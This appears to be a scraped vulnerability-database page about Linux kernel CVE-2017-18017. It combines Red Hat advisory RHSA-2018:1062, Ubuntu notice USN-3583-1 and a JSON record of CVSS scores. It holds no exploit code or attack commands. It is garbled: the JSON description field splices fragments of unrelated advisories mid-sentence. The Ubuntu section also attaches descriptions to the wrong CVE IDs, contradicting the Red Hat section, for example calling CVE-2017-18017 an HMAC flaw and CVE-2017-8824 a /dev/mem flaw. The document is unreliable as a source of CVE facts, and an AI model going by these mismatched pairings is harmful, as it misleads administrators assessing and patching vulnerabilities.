kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824, Important)
-
Kernel: kvm: nVMX: L2 guest could access hardware(L0) CR8 register (CVE-2017-12154, Important)
-
kernel: v4l2: disabled memory access protection mechanism allowing privilege escalation (CVE-2017-13166, Important)
-
kernel: media: use-after-free in [tuner-xc2028] media driver (CVE-2016-7913, Moderate)
-
kernel: drm/vmwgfx: fix integer overflow in vmw_surface_define_ioctl() (CVE-2017-7294, Moderate)
-
kernel: Incorrect type conversion for size during dma allocation (CVE-2017-9725, Moderate)
-
kernel: memory leak when merging buffers in SCSI IO vectors (CVE-2017-12190, Moderate)
-
kernel: vfs: BUG in truncate_inode_pages_range() and fuse client (CVE-2017-15121, Moderate)
-
kernel: Use-after-free in userfaultfd_event_wait_completion function in userfaultfd.c (CVE-2017-15126, Moderate)
-
kernel: net: double-free and memory corruption in get_net_ns_by_id() (CVE-2017-15129, Moderate)
-
kernel: Use-after-free in snd_seq_ioctl_create_port() (CVE-2017-15265, Moderate)
-
kernel: Missing capabilities check in net/netfilter/nfnetlink_cthelper.c allows for unprivileged access to systemwide nfnl_cthelper_list structure (CVE-2017-17448, Moderate)
-
kernel: Missing namespace check in net/netlink/af_netlink.c allows for network monitors to observe systemwide activity (CVE-2017-17449, Moderate)
-
kernel: Unallocated memory access by malicious USB device via bNumInterfaces overflow (CVE-2017-17558, Moderate)
-
kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c (CVE-2017-18017, Moderate)
-
kernel: Race condition in drivers/md/dm.c:dm_get_from_kobject() allows local users to cause a denial of service (CVE-2017-18203, Moderate)
-
kernel: kvm: Reachable BUG() on out-of-bounds guest IRQ (CVE-2017-1000252, Moderate)
-
Kernel: KVM: DoS via write flood to I/O port 0x80 (CVE-2017-1000407, Moderate)
-
kernel: Stack information leak in the EFS element (CVE-2017-1000410, Moderate)
-
kernel: Kernel address information leak in drivers/acpi/sbshc.c:acpi_smbus_hc_add() function potentially allowing KASLR bypass (CVE-2018-5750, Moderate)
-
kernel: Race condition in sound system can lead to denial of service (CVE-2018-1000004, Moderate)
-
kernel: multiple Low security impact security issues (CVE-2016-3672, CVE-2017-14140, CVE-2017-15116, CVE-2017-15127, CVE-2018-6927, Low)
Red Hat would like to thank Eyal Itkin for reporting CVE-2016-8633; Google Project Zero for reporting CVE-2017-5754; Mohamed Ghannam for reporting CVE-2017-8824; Jim Mattson (Google.com) for reporting CVE-2017-12154; Vitaly Mayatskih for reporting CVE-2017-12190; Andrea Arcangeli (Engineering) for reporting CVE-2017-15126; Kirill Tkhai for reporting CVE-2017-15129; Jan H. SchAPnherr (Amazon) for reporting CVE-2017-1000252; and Armis Labs for reporting CVE-2017-1000410. The CVE-2017-15121 issue was discovered by Miklos Szeredi (Red Hat) and the CVE-2017-15116 issue was discovered by ChunYu Wang (Red Hat).
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.5 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
1132610 - nfsd does not release free space of a file created with dd oflag=direct where there was no space left on device even after manual deletion 1324749 - CVE-2016-3672 kernel: unlimiting the stack disables ASLR 1334439 - Unable to disable IPv6 DAD or Optimistic DAD for all interfaces 1372079 - ixgbe nic is falsely advertising MII support 1391490 - CVE-2016-8633 kernel: Buffer overflow in firewire driver via crafted incoming packets 1402885 - CVE-2016-7913 kernel: media: use-after-free in [tuner-xc2028] media driver 1436798 - CVE-2017-7294 kernel: drm/vmwgfx: fix integer overflow in vmw_surface_define_ioctl() 1450205 - Gratuitous ARP updates received in span of 2-3 seconds time frame are all ignored 1458032 - [Intel 7.5 Bug] KVMGT: Bogus PCI BAR emulation 1460213 - cls_matchall: kernel panic when used with classful qdiscs 1461282 - kernel: ICMP rate limiting is too aggressive on loopback 1471875 - soft lockups during unmount when dentry cache is very large 1488329 - CVE-2017-14140 kernel: Missing permission check in move_pages system call 1489088 - CVE-2017-9725 kernel: Incorrect type conversion for size during dma allocation 1489542 - Behavior change in autofs expiry timer when a path walk is done following commit from BZ 1413523 1490673 - Kernel Panic always happen immediately whenever make "debug.panic_on_rcu_stall=1" set on RHEL7.4 1490781 - CVE-2017-1000252 kernel: kvm: Reachable BUG() on out-of-bounds guest IRQ 1491224 - CVE-2017-12154 Kernel: kvm: nVMX: L2 guest could access hardware(L0) CR8 register 1493125 - [RFE] Kernel address space layout randomization [KASLR] qemu support (kernel) 1495089 - CVE-2017-12190 kernel: memory leak when merging buffers in SCSI IO vectors 1496836 - [RH 7.5 bug] Request for upstream commit 3664847d95e6 to be merged into RHEL 7.5/7.4 1501878 - CVE-2017-15265 kernel: Use-after-free in snd_seq_ioctl_create_port() 1502601 - [Hyper-V][RHEL7.4] hang when thaw on microsoft hyper-v 1506382 - deadlock in nfs v4 client init 1507025 - [ESXi][RHEL7.5]x86/vmware: Skip timer_irq_works() check on VMware 1507026 - [ESXi][RHEL7.5]x86/vmware: Skip lapic calibration on VMware. 1514609 - CVE-2017-15116 kernel: Null pointer dereference in rngapi_reset function 1519160 - CVE-2017-1000410 kernel: Stack information leak in the EFS element 1519591 - CVE-2017-8824 kernel: Use-after-free vulnerability in DCCP socket 1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling 1520328 - CVE-2017-1000407 Kernel: KVM: DoS via write flood to I/O port 0x80 1520893 - CVE-2017-15121 kernel: vfs: BUG in truncate_inode_pages_range() and fuse client 1523481 - CVE-2017-15126 kernel: Use-after-free in userfaultfd_event_wait_completion function in userfaultfd.c 1525218 - CVE-2017-15127 kernel: Improper error handling of VM_SHARED hugetlbfs mapping in mm/hugetlb.c 1525474 - CVE-2017-17558 kernel: Unallocated memory access by malicious USB device via bNumInterfaces overflow 1525762 - CVE-2017-17449 kernel: Missing namespace check in net/netlink/af_netlink.c allows for network monitors to observe systemwide activity 1525768 - CVE-2017-17448 kernel: Missing capabilities check in net/netfilter/nfnetlink_cthelper.c allows for unprivileged access to systemwide nfnl_cthelper_list structure 1531135 - CVE-2017-18017 kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c 1531174 - CVE-2017-15129 kernel: net: double-free and memory corruption in get_net_ns_by_id() 1534272 - md: raid0 device creation prints blank line to journalctl 1535315 - CVE-2018-1000004 kernel: Race condition in sound system can lead to denial of service 1539706 - CVE-2018-5750 kernel: Kernel address information leak in drivers/acpi/sbshc.c:acpi_smbus_hc_add() function potentially allowing KASLR bypass 1542013 - RHEL-7.5: Cannot set port mirroring onto two interface 1544612 - CVE-2018-6927 kernel: Integer overflow in futex.c:futux_requeue can lead to denial of service or unspecified impact 1548412 - CVE-2017-13166 kernel: v4l2: disabled memory access protection mechanism allowing privilege escalation 1550811 - CVE-2017-18203 kernel: Race condition in drivers/md/dm.c:dm_get_from_kobject() allows local users to cause a denial of service
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: kernel-3.10.0-862.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-862.el7.noarch.rpm kernel-doc-3.10.0-862.el7.noarch.rpm
x86_64: kernel-3.10.0-862.el7.x86_64.rpm kernel-debug-3.10.0-862.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-debug-devel-3.10.0-862.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.el7.x86_64.rpm kernel-devel-3.10.0-862.el7.x86_64.rpm kernel-headers-3.10.0-862.el7.x86_64.rpm kernel-tools-3.10.0-862.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-tools-libs-3.10.0-862.el7.x86_64.rpm perf-3.10.0-862.el7.x86_64.rpm perf-debuginfo-3.10.0-862.el7.x86_64.rpm python-perf-3.10.0-862.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: kernel-debug-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-862.el7.x86_64.rpm perf-debuginfo-3.10.0-862.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: kernel-3.10.0-862.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-862.el7.noarch.rpm kernel-doc-3.10.0-862.el7.noarch.rpm
x86_64: kernel-3.10.0-862.el7.x86_64.rpm kernel-debug-3.10.0-862.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-debug-devel-3.10.0-862.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.el7.x86_64.rpm kernel-devel-3.10.0-862.el7.x86_64.rpm kernel-headers-3.10.0-862.el7.x86_64.rpm kernel-tools-3.10.0-862.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-tools-libs-3.10.0-862.el7.x86_64.rpm perf-3.10.0-862.el7.x86_64.rpm perf-debuginfo-3.10.0-862.el7.x86_64.rpm python-perf-3.10.0-862.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: kernel-debug-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-862.el7.x86_64.rpm perf-debuginfo-3.10.0-862.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: kernel-3.10.0-862.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-862.el7.noarch.rpm kernel-doc-3.10.0-862.el7.noarch.rpm
ppc64: kernel-3.10.0-862.el7.ppc64.rpm kernel-bootwrapper-3.10.0-862.el7.ppc64.rpm kernel-debug-3.10.0-862.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-862.el7.ppc64.rpm kernel-debug-devel-3.10.0-862.el7.ppc64.rpm kernel-debuginfo-3.10.0-862.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-862.el7.ppc64.rpm kernel-devel-3.10.0-862.el7.ppc64.rpm kernel-headers-3.10.0-862.el7.ppc64.rpm kernel-tools-3.10.0-862.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-862.el7.ppc64.rpm kernel-tools-libs-3.10.0-862.el7.ppc64.rpm perf-3.10.0-862.el7.ppc64.rpm perf-debuginfo-3.10.0-862.el7.ppc64.rpm python-perf-3.10.0-862.el7.ppc64.rpm python-perf-debuginfo-3.10.0-862.el7.ppc64.rpm
ppc64le: kernel-3.10.0-862.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-862.el7.ppc64le.rpm kernel-debug-3.10.0-862.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-862.el7.ppc64le.rpm kernel-debuginfo-3.10.0-862.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-862.el7.ppc64le.rpm kernel-devel-3.10.0-862.el7.ppc64le.rpm kernel-headers-3.10.0-862.el7.ppc64le.rpm kernel-tools-3.10.0-862.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-862.el7.ppc64le.rpm kernel-tools-libs-3.10.0-862.el7.ppc64le.rpm perf-3.10.0-862.el7.ppc64le.rpm perf-debuginfo-3.10.0-862.el7.ppc64le.rpm python-perf-3.10.0-862.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-862.el7.ppc64le.rpm
s390x: kernel-3.10.0-862.el7.s390x.rpm kernel-debug-3.10.0-862.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-862.el7.s390x.rpm kernel-debug-devel-3.10.0-862.el7.s390x.rpm kernel-debuginfo-3.10.0-862.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-862.el7.s390x.rpm kernel-devel-3.10.0-862.el7.s390x.rpm kernel-headers-3.10.0-862.el7.s390x.rpm kernel-kdump-3.10.0-862.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-862.el7.s390x.rpm kernel-kdump-devel-3.10.0-862.el7.s390x.rpm perf-3.10.0-862.el7.s390x.rpm perf-debuginfo-3.10.0-862.el7.s390x.rpm python-perf-3.10.0-862.el7.s390x.rpm python-perf-debuginfo-3.10.0-862.el7.s390x.rpm
x86_64: kernel-3.10.0-862.el7.x86_64.rpm kernel-debug-3.10.0-862.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-debug-devel-3.10.0-862.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.el7.x86_64.rpm kernel-devel-3.10.0-862.el7.x86_64.rpm kernel-headers-3.10.0-862.el7.x86_64.rpm kernel-tools-3.10.0-862.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-tools-libs-3.10.0-862.el7.x86_64.rpm perf-3.10.0-862.el7.x86_64.rpm perf-debuginfo-3.10.0-862.el7.x86_64.rpm python-perf-3.10.0-862.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: kernel-debug-debuginfo-3.10.0-862.el7.ppc64.rpm kernel-debuginfo-3.10.0-862.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-862.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-862.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-862.el7.ppc64.rpm perf-debuginfo-3.10.0-862.el7.ppc64.rpm python-perf-debuginfo-3.10.0-862.el7.ppc64.rpm
ppc64le: kernel-debug-debuginfo-3.10.0-862.el7.ppc64le.rpm kernel-debug-devel-3.10.0-862.el7.ppc64le.rpm kernel-debuginfo-3.10.0-862.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-862.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-862.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-862.el7.ppc64le.rpm perf-debuginfo-3.10.0-862.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-862.el7.ppc64le.rpm
x86_64: kernel-debug-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-862.el7.x86_64.rpm perf-debuginfo-3.10.0-862.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: kernel-3.10.0-862.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-862.el7.noarch.rpm kernel-doc-3.10.0-862.el7.noarch.rpm
x86_64: kernel-3.10.0-862.el7.x86_64.rpm kernel-debug-3.10.0-862.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-debug-devel-3.10.0-862.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.el7.x86_64.rpm kernel-devel-3.10.0-862.el7.x86_64.rpm kernel-headers-3.10.0-862.el7.x86_64.rpm kernel-tools-3.10.0-862.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-tools-libs-3.10.0-862.el7.x86_64.rpm perf-3.10.0-862.el7.x86_64.rpm perf-debuginfo-3.10.0-862.el7.x86_64.rpm python-perf-3.10.0-862.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: kernel-debug-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-862.el7.x86_64.rpm perf-debuginfo-3.10.0-862.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Ubuntu Security Notice USN-3583-1 February 23, 2018
linux vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
Summary:
Several security issues were fixed in the Linux kernel. An attacker could construct a malicious file system that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-0750)
It was discovered that a race condition leading to a use-after-free vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM could use this to cause a denial of service (system crash) in the host OS. (CVE-2017-1000407)
Bo Zhang discovered that the netlink wireless configuration interface in the Linux kernel did not properly validate attributes when handling certain requests. A local attacker with the CAP_NET_ADMIN could use this to cause a denial of service (system crash). (CVE-2017-12153)
Vitaly Mayatskikh discovered that the SCSI subsystem in the Linux kernel did not properly track reference counts when merging buffers. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2017-12190)
It was discovered that the key management subsystem in the Linux kernel did not properly restrict key reads on negatively instantiated keys. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-12192)
It was discovered that an integer overflow existed in the sysfs interface for the QLogic 24xx+ series SCSI driver in the Linux kernel. A local privileged attacker could use this to cause a denial of service (system crash). (CVE-2017-14051)
Otto Ebeling discovered that the memory manager in the Linux kernel did not properly check the effective UID in some situations. A local attacker could use this to expose sensitive information. (CVE-2017-14140)
It was discovered that the ATI Radeon framebuffer driver in the Linux kernel did not properly initialize a data structure returned to user space. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2017-14156)
ChunYu Wang discovered that the iSCSI transport implementation in the Linux kernel did not properly validate data structures. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-14489)
James Patrick-Evans discovered a race condition in the LEGO USB Infrared Tower driver in the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code, (CVE-2017-15115)
It was discovered that the key management subsystem in the Linux kernel did not properly handle NULL payloads with non-zero length values. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-15274)
It was discovered that the Bluebooth Network Encapsulation Protocol (BNEP) implementation in the Linux kernel did not validate the type of socket passed in the BNEPCONNADD ioctl(). A local attacker with the CAP_NET_ADMIN privilege could use this to cause a denial of service (system crash) or possibly execute arbitrary code. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16525)
It was discovered that the netfilter passive OS fingerprinting (xt_osf) module did not properly perform access control checks. A local attacker could improperly modify the systemwide OS fingerprint list. (CVE-2017-17450)
It was discovered that the HMAC implementation did not validate the state of the underlying cryptographic hash algorithm. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. A remote attacker could use this to cause a denial of service (system crash). (CVE-2017-18017)
Gareth Evans discovered that the shm IPC subsystem in the Linux kernel did not properly restrict mapping page zero. A local privileged attacker could use this to execute arbitrary code. (CVE-2017-5669)
It was discovered that an integer overflow vulnerability existing in the IPv6 implementation in the Linux kernel. A local attacker could use this to cause a denial of service (infinite loop). (CVE-2017-7542)
Tommi Rantala and Brad Spengler discovered that the memory manager in the Linux kernel did not properly enforce the CONFIG_STRICT_DEVMEM protection mechanism. A local attacker with access to /dev/mem could use this to expose sensitive information or possibly execute arbitrary code. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-8824)
Mohamed Ghannam discovered a null pointer dereference in the RDS (Reliable Datagram Sockets) protocol implementation of the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-5333)
ee3/4ePS discovered that a race condition existed in loop block device implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-5344)
USN-3524-1 mitigated CVE-2017-5754 (Meltdown) for the amd64 architecture in Ubuntu 14.04 LTS. This update provides the corresponding mitigations for the ppc64el architecture. Original advisory details:
Jann Horn discovered that microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized memory reads via sidechannel attacks. This flaw is known as Meltdown. A local attacker could use this to expose sensitive information, including kernel memory. (CVE-2017-5754)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: linux-image-3.13.0-142-generic 3.13.0-142.191 linux-image-3.13.0-142-generic-lpae 3.13.0-142.191 linux-image-3.13.0-142-lowlatency 3.13.0-142.191 linux-image-3.13.0-142-powerpc-e500 3.13.0-142.191 linux-image-3.13.0-142-powerpc-e500mc 3.13.0-142.191 linux-image-3.13.0-142-powerpc-smp 3.13.0-142.191 linux-image-3.13.0-142-powerpc64-emb 3.13.0-142.191 linux-image-3.13.0-142-powerpc64-smp 3.13.0-142.191 linux-image-generic 3.13.0.142.152 linux-image-generic-lpae 3.13.0.142.152 linux-image-lowlatency 3.13.0.142.152 linux-image-powerpc-e500 3.13.0.142.152 linux-image-powerpc-e500mc 3.13.0.142.152 linux-image-powerpc-smp 3.13.0.142.152 linux-image-powerpc64-emb 3.13.0.142.152 linux-image-powerpc64-smp 3.13.0.142.152
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.
References: https://usn.ubuntu.com/usn/usn-3583-1 CVE-2017-0750, CVE-2017-0861, CVE-2017-1000407, CVE-2017-12153, CVE-2017-12190, CVE-2017-12192, CVE-2017-14051, CVE-2017-14140, CVE-2017-14156, CVE-2017-14489, CVE-2017-15102, CVE-2017-15115, CVE-2017-15274, CVE-2017-15868, CVE-2017-16525, CVE-2017-17450, CVE-2017-17806, CVE-2017-18017, CVE-2017-5669, CVE-2017-5754, CVE-2017-7542, CVE-2017-7889, CVE-2017-8824, CVE-2018-5333, CVE-2018-5344
Package Information: https://launchpad.net/ubuntu/+source/linux/3.13.0-142.191
Show details on source website{
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"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2017-18017",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-18017",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18017",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2017-18017",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-201801-145",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-109097",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-18017",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-109097"
},
{
"db": "VULMON",
"id": "CVE-2017-18017"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-145"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011875"
},
{
"db": "NVD",
"id": "CVE-2017-18017"
}
]
},
"description": {
"_id": null,
"data": "The tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c in the Linux kernel before 4.11, and 4.9.x before 4.9.36, allows remote attackers to cause a denial of service (use-after-free and memory corruption) or possibly have unspecified other impact by leveraging the presence of xt_TCPMSS in an iptables action. Linux Kernel Contains a vulnerability in the use of freed memory.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Linux Kernel is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to cause a denial-of-service condition. \nLinux kernel versions prior to 4.11, and 4.9.x prior to 4.9.36 are vulnerable. 7.3) - ppc64, ppc64le, x86_64\n\n3. \n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of Load \u0026 Store instructions\n(a commonly used performance optimization). It relies on the presence of a\nprecisely-defined instruction sequence in the privileged code as well as\nthe fact that memory read from address to which a recent memory write has\noccurred may see an older value and subsequently cause an update into the\nmicroprocessor\u0027s data cache even for speculatively executed instructions\nthat never actually commit (retire). As a result, an unprivileged attacker\ncould use this flaw to read privileged memory by conducting targeted cache\nside-channel attacks. (CVE-2018-3639)\n\nNote: This issue is present in hardware and cannot be fully fixed via\nsoftware update. The updated kernel packages provide software side of the\nmitigation for this hardware issue. To be fully functional, up-to-date CPU\nmicrocode applied on the system might be required. \n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting CVE-2018-3639. \n\nBug Fix(es):\n\nThese updated kernel packages include also numerous bug fixes. Space\nprecludes documenting all of these bug fixes in this advisory. See the bug\nfix descriptions in the related Knowledge Article:\nhttps://access.redhat.com/articles/3461451\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1531135 - CVE-2017-18017 kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c\n1566890 - CVE-2018-3639 hw: cpu: speculative store bypass\n\n6. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. (BZ#1549731)\n\n* Intel Core X-Series (Skylake) processors use a hardcoded Time Stamp\nCounter (TSC) frequency of 25 MHz. In some cases this can be imprecise and\nlead to timing-related problems such as time drift, timers being triggered\nearly, or TSC clock instability. This update mitigates these problems by no\nlonger using the \"native_calibrate_tsc()\" function to define the TSC\nfrequency. Refined calibration is now used to update the clock rate\naccordingly in these cases. (BZ#1547854)\n\n4. \n\nRed Hat would like to thank Mohamed Ghannam for reporting CVE-2017-8824;\nJan H. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: kernel security, bug fix, and enhancement update\nAdvisory ID: RHSA-2018:1062-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2018:1062\nIssue date: 2018-04-10\nCVE Names: CVE-2016-3672 CVE-2016-7913 CVE-2016-8633 \n CVE-2017-7294 CVE-2017-8824 CVE-2017-9725 \n CVE-2017-12154 CVE-2017-12190 CVE-2017-13166 \n CVE-2017-14140 CVE-2017-15116 CVE-2017-15121 \n CVE-2017-15126 CVE-2017-15127 CVE-2017-15129 \n CVE-2017-15265 CVE-2017-17448 CVE-2017-17449 \n CVE-2017-17558 CVE-2017-18017 CVE-2017-18203 \n CVE-2017-1000252 CVE-2017-1000407 CVE-2017-1000410 \n CVE-2018-5750 CVE-2018-6927 CVE-2018-1000004 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - 